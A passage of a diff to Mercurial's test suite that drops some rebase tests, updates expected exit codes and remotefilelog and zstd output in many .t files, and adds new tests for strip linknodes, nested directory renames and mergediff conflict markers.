/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [255] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. - - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - Test that bookmark is moved and working dir is updated when all changesets have equivalents in destination $ hg init rbsrepo && cd rbsrepo $ echo "[experimental]" > .hg/hgrc $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc $ echo root > root && hg ci -Am root adding root $ echo a > a && hg ci -Am a @@ -1759,30 +123,24 @@ / o 0:426bada5c675 A -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), +For some reasons (--hidden, directaccess, etc.), rebasestate may contain hidden hashes. "rebase --abort" should work regardless. $ hg init $TESTTMP/hidden-state1 $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF $ hg debugdrawdag <<'EOS' > C > | - > D B # prune: B, C - > |/ # B/D=B + > D B # B/D=B + > |/ > A > EOS $ eval `hg tags -T '{tag}={node}\n'` $ rm .hg/localtags - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) + $ hg update -q $C $ hg rebase -s $B -d $D rebasing 1:2ec65233581b "B" merging D @@ -1790,12 +148,19 @@ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') [240] + $ hg debugobsolete $B + 1 new obsolescence markers + obsoleted 1 changesets + 1 new orphan changesets + $ hg debugobsolete $C + 1 new obsolescence markers + obsoleted 1 changesets $ cp -R . $TESTTMP/hidden-state2 $ hg log -G @ 2:b18e25de2cf5 D | - | % 1:2ec65233581b B (pruned using prune) + | % 1:2ec65233581b B (pruned) |/ o 0:426bada5c675 A @@ -1818,14 +183,10 @@ (no more unresolved files) continue: hg rebase --continue $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" + note: not rebasing 1:2ec65233581b "B", it has no successor + note: not rebasing 3:7829726be4dc tip "C", it has no successor $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D + @ 2:b18e25de2cf5 D | o 0:426bada5c675 A @@ -1941,7 +302,7 @@ $ hg rebase --stop abort: cannot remove original changesets with unrebased descendants (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [255] + [20] $ hg rebase --abort saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg rebase aborted @@ -2020,7 +381,7 @@ [240] $ hg rebase --stop abort: cannot stop in --collapse session - [255] + [20] $ hg rebase --abort rebase aborted $ hg diff diff --git a/tests/test-rebase-parameters.t b/tests/test-rebase-parameters.t --- a/tests/test-rebase-parameters.t +++ b/tests/test-rebase-parameters.t @@ -66,7 +66,7 @@ $ hg rebase --continue --collapse abort: cannot use collapse with continue or abort - [255] + [10] $ hg rebase --continue --dest 4 abort: cannot specify both --continue and --dest @@ -94,15 +94,15 @@ $ hg rebase --rev 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source 1 --source 'wdir()' --dest 6 abort: cannot rebase the working copy - [255] + [10] $ hg rebase --source '1 & !1' --dest 8 empty "source" revision set - nothing to rebase @@ -508,11 +508,11 @@ $ hg rebase -i abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit") - [255] + [10] $ hg rebase --interactive abort: interactive history editing is supported by the 'histedit' extension (see "hg --config extensions.histedit= help -e histedit") - [255] + [10] $ cd .. diff --git a/tests/test-rebase-scenario-global.t b/tests/test-rebase-scenario-global.t --- a/tests/test-rebase-scenario-global.t +++ b/tests/test-rebase-scenario-global.t @@ -266,14 +266,14 @@ $ hg rebase -s 5 -d 6 abort: source and destination form a cycle - [255] + [10] G onto B - merge revision with both parents not in ancestors of target: $ hg rebase -s 6 -d 1 rebasing 6:eea13746799a "G" abort: cannot rebase 6:eea13746799a without moving at least one of its parents - [255] + [10] $ hg rebase --abort rebase aborted @@ -325,9 +325,8 @@ $ hg pull --config phases.publish=True -q -r 6 . # update phase of 6 $ hg rebase -d 0 -b 6 - abort: cannot rebase public changesets - (see 'hg help phases' for details) - [10] + nothing to rebase + [1] $ hg rebase -d 5 -b 6 abort: cannot rebase public changesets (see 'hg help phases' for details) diff --git a/tests/test-remotefilelog-bgprefetch.t b/tests/test-remotefilelog-bgprefetch.t --- a/tests/test-remotefilelog-bgprefetch.t +++ b/tests/test-remotefilelog-bgprefetch.t @@ -29,8 +29,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 776 bytes of data - transferred 776 bytes in * seconds (*/sec) (glob) + 2 files to transfer, 776 bytes of data (no-zstd !) + transferred 776 bytes in * seconds (*/sec) (glob) (no-zstd !) + 2 files to transfer, 784 bytes of data (zstd !) + transferred 784 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found @@ -63,6 +65,7 @@ > EOF $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/6b4b6f66ef8c-b4b8bdaf-backup.hg (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ clearcache $ hg pull diff --git a/tests/test-remotefilelog-bundles.t b/tests/test-remotefilelog-bundles.t --- a/tests/test-remotefilelog-bundles.t +++ b/tests/test-remotefilelog-bundles.t @@ -26,12 +26,12 @@ $ hg strip -r 66ee28d0328c 1 files updated, 0 files merged, 0 files removed, 0 files unresolved saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob) - 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg unbundle .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg adding changesets adding manifests adding file changes - added 2 changesets with 0 changes to 0 files + added 2 changesets with 2 changes to 1 files new changesets 66ee28d0328c:16db62c5946f (run 'hg update' to get a working copy) @@ -51,7 +51,7 @@ Pulling from a shallow bundle - $ hg strip -r 66ee28d0328c + $ hg strip -r 66ee28d0328c --config remotefilelog.strip.includefiles=none saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob) $ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg pulling from .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg @@ -63,12 +63,13 @@ new changesets 66ee28d0328c (1 drafts) (run 'hg update' to get a working copy) -Pulling from a full bundle +Pulling from a full bundle, also testing that strip produces a full bundle by +default. $ hg strip -r 66ee28d0328c saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg (glob) - $ hg pull -r 66ee28d0328c ../fullbundle.hg - pulling from ../fullbundle.hg + $ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg + pulling from .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg searching for changes abort: cannot pull from full bundles (use `hg unbundle` instead) diff --git a/tests/test-remotefilelog-clone-tree.t b/tests/test-remotefilelog-clone-tree.t --- a/tests/test-remotefilelog-clone-tree.t +++ b/tests/test-remotefilelog-clone-tree.t @@ -30,6 +30,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -71,6 +73,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -91,8 +95,7 @@ # flakiness here $ hg clone --noupdate ssh://user@dummy/shallow full 2>/dev/null streaming all changes - remote: abort: Cannot clone from a shallow repo to a full repo. - [255] + [100] # getbundle full clone @@ -113,6 +116,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-clone.t b/tests/test-remotefilelog-clone.t --- a/tests/test-remotefilelog-clone.t +++ b/tests/test-remotefilelog-clone.t @@ -27,6 +27,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -61,6 +63,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store @@ -85,9 +89,9 @@ $ TEMP_STDERR=full-clone-from-shallow.stderr.tmp $ hg clone --noupdate ssh://user@dummy/shallow full 2>$TEMP_STDERR streaming all changes + [100] + $ cat $TEMP_STDERR remote: abort: Cannot clone from a shallow repo to a full repo. - [255] - $ cat $TEMP_STDERR abort: pull failed on remote $ rm $TEMP_STDERR @@ -110,6 +114,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-local.t b/tests/test-remotefilelog-local.t --- a/tests/test-remotefilelog-local.t +++ b/tests/test-remotefilelog-local.t @@ -116,7 +116,7 @@ $ hg strip -r . 2 files updated, 0 files merged, 1 files removed, 0 files unresolved saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/19edf50f4de7-df3d0f74-backup.hg (glob) - 4 files fetched over 2 fetches - (4 misses, 0.00% hit ratio) over *s (glob) + 3 files fetched over 2 fetches - (3 misses, 0.00% hit ratio) over *s (glob) # unbundle @@ -133,13 +133,14 @@ adding changesets adding manifests adding file changes - added 1 changesets with 0 changes to 0 files + added 1 changesets with 3 changes to 3 files new changesets 19edf50f4de7 (1 drafts) (run 'hg update' to get a working copy) + 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg up 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - 4 files fetched over 1 fetches - (4 misses, 0.00% hit ratio) over *s (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ cat a a @@ -148,7 +149,7 @@ $ clearcache $ hg revert -r .~2 y z no changes needed to z - 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ hg checkout -C -r . -q # explicit bundle should produce full bundle file @@ -159,7 +160,7 @@ $ cd .. $ hgcloneshallow ssh://user@dummy/master shallow2 -q - 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ cd shallow2 $ hg unbundle ../local.bundle adding changesets diff --git a/tests/test-remotefilelog-log.t b/tests/test-remotefilelog-log.t --- a/tests/test-remotefilelog-log.t +++ b/tests/test-remotefilelog-log.t @@ -30,6 +30,8 @@ exp-remotefilelog-repo-req-1 fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-remotefilelog-partial-shallow.t b/tests/test-remotefilelog-partial-shallow.t --- a/tests/test-remotefilelog-partial-shallow.t +++ b/tests/test-remotefilelog-partial-shallow.t @@ -18,8 +18,10 @@ $ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.includepattern=foo streaming all changes - 3 files to transfer, 336 bytes of data - transferred 336 bytes in * seconds (*/sec) (glob) + 3 files to transfer, 336 bytes of data (no-zstd !) + transferred 336 bytes in * seconds (* */sec) (glob) (no-zstd !) + 3 files to transfer, 338 bytes of data (zstd !) + transferred 338 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cat >> shallow/.hg/hgrc <<EOF diff --git a/tests/test-remotefilelog-prefetch.t b/tests/test-remotefilelog-prefetch.t --- a/tests/test-remotefilelog-prefetch.t +++ b/tests/test-remotefilelog-prefetch.t @@ -22,8 +22,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 528 bytes of data - transferred 528 bytes in * seconds (*/sec) (glob) + 2 files to transfer, 528 bytes of data (no-zstd !) + transferred 528 bytes in * seconds (* */sec) (glob) (no-zstd !) + 2 files to transfer, 532 bytes of data (zstd !) + transferred 532 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cd shallow @@ -86,6 +88,7 @@ $ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/109c3a557a73-3f43405e-backup.hg (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ clearcache $ hg pull @@ -163,8 +166,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow2 streaming all changes - 2 files to transfer, 528 bytes of data - transferred 528 bytes in * seconds * (glob) + 2 files to transfer, 528 bytes of data (no-zstd !) + transferred 528 bytes in * seconds * (glob) (no-zstd !) + 2 files to transfer, 532 bytes of data (zstd !) + transferred 532 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default @@ -180,7 +185,7 @@ x: untracked file differs 3 files fetched over 1 fetches - (3 misses, 0.00% hit ratio) over * (glob) abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ hg revert --all # Test batch fetching of lookup files during hg status diff --git a/tests/test-remotefilelog-sparse.t b/tests/test-remotefilelog-sparse.t --- a/tests/test-remotefilelog-sparse.t +++ b/tests/test-remotefilelog-sparse.t @@ -22,8 +22,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow --noupdate streaming all changes - 2 files to transfer, 527 bytes of data - transferred 527 bytes in 0.* seconds (*/sec) (glob) + 2 files to transfer, 527 bytes of data (no-zstd !) + transferred 527 bytes in * seconds (* */sec) (glob) (no-zstd !) + 2 files to transfer, 534 bytes of data (zstd !) + transferred 534 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cd shallow @@ -48,6 +50,7 @@ $ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/876b1317060d-b2e91d8d-backup.hg (glob) + 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg debugsparse --delete z @@ -72,8 +75,10 @@ $ hgcloneshallow ssh://user@dummy/master shallow2 streaming all changes - 2 files to transfer, 527 bytes of data - transferred 527 bytes in 0.* seconds (*) (glob) + 2 files to transfer, 527 bytes of data (no-zstd !) + transferred 527 bytes in * seconds (*) (glob) (no-zstd !) + 2 files to transfer, 534 bytes of data (zstd !) + transferred 534 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found updating to branch default diff --git a/tests/test-remotefilelog-strip.t b/tests/test-remotefilelog-strip.t new file mode 100644 --- /dev/null +++ b/tests/test-remotefilelog-strip.t @@ -0,0 +1,68 @@ +#require no-windows + + $ . "$TESTDIR/remotefilelog-library.sh" + + $ hg init master + $ cd master + $ cat >> .hg/hgrc <<EOF + > [remotefilelog] + > server=True + > EOF + $ echo x > x + $ hg commit -qAm x + + $ cd .. + + $ hgcloneshallow ssh://user@dummy/master shallow -q + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + $ cd shallow + + $ cat >> $TESTTMP/get_file_linknode.py <<EOF + > from mercurial import node, registrar, scmutil + > cmdtable = {} + > command = registrar.command(cmdtable) + > @command(b'debug-file-linknode', [(b'r', b'rev', b'.', b'rev')], b'hg debug-file-linknode FILE') + > def debug_file_linknode(ui, repo, file, **opts): + > rflctx = scmutil.revsingle(repo.unfiltered(), opts['rev']).filectx(file) + > ui.status(b'%s\n' % node.hex(rflctx.ancestormap()[rflctx._filenode][2])) + > EOF + + $ cat >> .hg/hgrc <<EOF + > [ui] + > interactive=1 + > [extensions] + > strip= + > get_file_linknode=$TESTTMP/get_file_linknode.py + > [experimental] + > evolution=createmarkers,allowunstable + > EOF + $ echo a > a + $ hg commit -qAm msg1 + $ hg commit --amend 're:^$' -m msg2 + $ hg commit --amend 're:^$' -m msg3 + $ hg --hidden log -G -T '{rev} {node|short}' + @ 3 df91f74b871e + | + | x 2 70494d7ec5ef + |/ + | x 1 1e423846dde0 + |/ + o 0 b292c1e3311f + + $ hg debug-file-linknode -r 70494d a + df91f74b871e064c89afa1fe9e2f66afa2c125df + $ hg --hidden strip -r 1 3 + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/df91f74b871e-c94d67be-backup.hg + + $ hg --hidden log -G -T '{rev} {node|short}' + o 1 70494d7ec5ef + | + @ 0 b292c1e3311f + +Demonstrate that the linknode points to a commit that is actually in the repo +after the strip operation. Otherwise remotefilelog has to search every commit in +the repository looking for a valid linkrev every time it's queried, such as +during push. + $ hg debug-file-linknode -r 70494d a + 70494d7ec5ef6cd3cd6939a9fd2812f9956bf553 diff --git a/tests/test-remotefilelog-tags.t b/tests/test-remotefilelog-tags.t --- a/tests/test-remotefilelog-tags.t +++ b/tests/test-remotefilelog-tags.t @@ -18,8 +18,10 @@ $ hg clone --shallow ssh://user@dummy/master shallow --noupdate --config remotefilelog.excludepattern=.hgtags streaming all changes - 3 files to transfer, 662 bytes of data - transferred 662 bytes in * seconds (*/sec) (glob) + 3 files to transfer, 662 bytes of data (no-zstd !) + transferred 662 bytes in * seconds (* */sec) (glob) (no-zstd !) + 3 files to transfer, 665 bytes of data (zstd !) + transferred 665 bytes in * seconds (* */sec) (glob) (zstd !) searching for changes no changes found $ cat >> shallow/.hg/hgrc <<EOF diff --git a/tests/test-rename-dir-merge.t b/tests/test-rename-dir-merge.t --- a/tests/test-rename-dir-merge.t +++ b/tests/test-rename-dir-merge.t @@ -110,7 +110,7 @@ $ hg merge 2 b/c: untracked file differs abort: untracked files in working directory differ from files in requested revision - [255] + [20] $ cat b/c target but it should succeed if the content matches @@ -294,3 +294,45 @@ M t/t R a/s R a/t + + $ cd .. + + +Test that files are moved to a new directory based on the path prefix that +matches the most. dir1/ below gets renamed to dir2/, and dir1/subdir1/ gets +renamed to dir2/subdir2/. We want dir1/subdir1/newfile to move to +dir2/subdir2/ (not to dir2/subdir1/ as we would infer based on just the rename +of dir1/ to dir2/). + + $ hg init nested-renames + $ cd nested-renames + $ mkdir dir1 + $ echo a > dir1/file1 + $ echo b > dir1/file2 + $ mkdir dir1/subdir1 + $ echo c > dir1/subdir1/file3 + $ echo d > dir1/subdir1/file4 + $ hg ci -Aqm initial + $ hg mv dir1 dir2 + moving dir1/file1 to dir2/file1 + moving dir1/file2 to dir2/file2 + moving dir1/subdir1/file3 to dir2/subdir1/file3 + moving dir1/subdir1/file4 to dir2/subdir1/file4 + $ hg mv dir2/subdir1 dir2/subdir2 + moving dir2/subdir1/file3 to dir2/subdir2/file3 + moving dir2/subdir1/file4 to dir2/subdir2/file4 + $ hg ci -m 'move dir1/ to dir2/ and dir1/subdir1/ to dir2/subdir2/' + $ hg co 0 + 4 files updated, 0 files merged, 4 files removed, 0 files unresolved + $ echo e > dir1/subdir1/file5 + $ hg ci -Aqm 'add file in dir1/subdir1/' + $ hg merge 1 + 5 files updated, 0 files merged, 4 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg files + dir2/file1 + dir2/file2 + dir2/subdir2/file3 + dir2/subdir2/file4 + dir2/subdir2/file5 + $ cd .. diff --git a/tests/test-repo-compengines.t b/tests/test-repo-compengines.t --- a/tests/test-repo-compengines.t +++ b/tests/test-repo-compengines.t @@ -1,11 +1,19 @@ A new repository uses zlib storage, which doesn't need a requirement + $ cat << EOF >> $HGRCPATH + > [format] + > # stabilize test accross variant + > revlog-compression=zlib + > EOF + + $ hg init default $ cd default $ cat .hg/requires dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -54,6 +62,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -72,6 +81,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -175,6 +185,7 @@ exp-compression-none fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store diff --git a/tests/test-requires.t b/tests/test-requires.t --- a/tests/test-requires.t +++ b/tests/test-requires.t @@ -5,7 +5,7 @@ $ hg commit -m test $ rm .hg/requires $ hg tip - abort: unknown version (2) in revlog 00changelog.i + abort: unknown version (65535) in revlog 00changelog.i [50] $ echo indoor-pool > .hg/requires $ hg tip @@ -53,6 +53,8 @@ featuresetup-test fncache generaldelta + persistent-nodemap (rust !) + revlog-compression-zstd (zstd !) revlogv1 sparserevlog store diff --git a/tests/test-resolve.t b/tests/test-resolve.t --- a/tests/test-resolve.t +++ b/tests/test-resolve.t @@ -153,15 +153,15 @@ $ hg up 0 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] $ hg merge 2 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] $ hg merge --force 2 abort: outstanding merge conflicts (use 'hg resolve' to resolve) - [255] + [20] set up conflict-free merge @@ -255,11 +255,13 @@ ancestor path: file1 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd) other path: file1 (node 6f4310b00b9a147241b071a60c28a650827fb03d) extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac + extra: merged = yes file: file2 (state "u") local path: file2 (hash cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523, flags "") ancestor path: file2 (node 2ed2a3912a0b24502043eae84ee4b279c18b90dd) other path: file2 (node 6f4310b00b9a147241b071a60c28a650827fb03d) extra: ancestorlinknode = 99726c03216e233810a2564cbc0adfe395007eac + extra: merged = yes $ hg resolve -l R file1 U file2 @@ -271,7 +273,7 @@ { "commits": [{"label": "working copy", "name": "local", "node": "57653b9f834a4493f7240b0681efcb9ae7cab745"}, {"label": "merge rev", "name": "other", "node": "dc77451844e37f03f5c559e3b8529b2b48d381d1"}], "extras": [], - "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}] + "files": [{"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file1", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "60b27f004e454aca81b0480209cce5081ec52390", "local_path": "file1", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file1", "path": "file1", "state": "r"}, {"ancestor_node": "2ed2a3912a0b24502043eae84ee4b279c18b90dd", "ancestor_path": "file2", "extras": [{"key": "ancestorlinknode", "value": "99726c03216e233810a2564cbc0adfe395007eac"}, {"key": "merged", "value": "yes"}], "local_flags": "", "local_key": "cb99b709a1978bd205ab9dfd4c5aaa1fc91c7523", "local_path": "file2", "other_node": "6f4310b00b9a147241b071a60c28a650827fb03d", "other_path": "file2", "path": "file2", "state": "u"}] } ] @@ -344,6 +346,24 @@ $ hg resolve -l R file1 R file2 +Test with :mergediff conflict markers + $ hg resolve --unmark + $ hg resolve --re-merge -t :mergediff file2 + merging file2 + warning: conflicts while merging file2! (edit, then use 'hg resolve --mark') + [1] + $ hg resolve -l + U file1 + U file2 + $ hg --config commands.resolve.mark-check=abort resolve -m + warning: the following files still have conflict markers: + file2 + abort: conflict markers detected + (use --all to mark anyway) + [20] + $ hg resolve -l + U file1 + U file2 Test option value 'warn' $ hg resolve --unmark $ hg resolve -l diff --git a/tests/test-revlog-raw.py b/tests/test-revlog-raw.py --- a/tests/test-revlog-raw.py +++ b/tests/test-revlog-raw.py @@ -51,10 +51,10 @@ def readprocessor(self, rawtext): # True: the returned text could be used to verify hash text = rawtext[len(_extheader) :].replace(b'i', b'1') - return text, True, {} + return text, True -def writeprocessor(self, text, sidedata): +def writeprocessor(self, text): # False: the returned rawtext shouldn't be used to verify hash rawtext = _extheader + text.replace(b'1', b'i') return rawtext, False @@ -147,6 +147,7 @@ b'flags': rlog.flags(r), b'deltabase': rlog.node(deltaparent), b'delta': rlog.revdiff(deltaparent, r), + b'sidedata': rlog.sidedata(r), } def deltaiter(self): @@ -159,10 +160,11 @@ 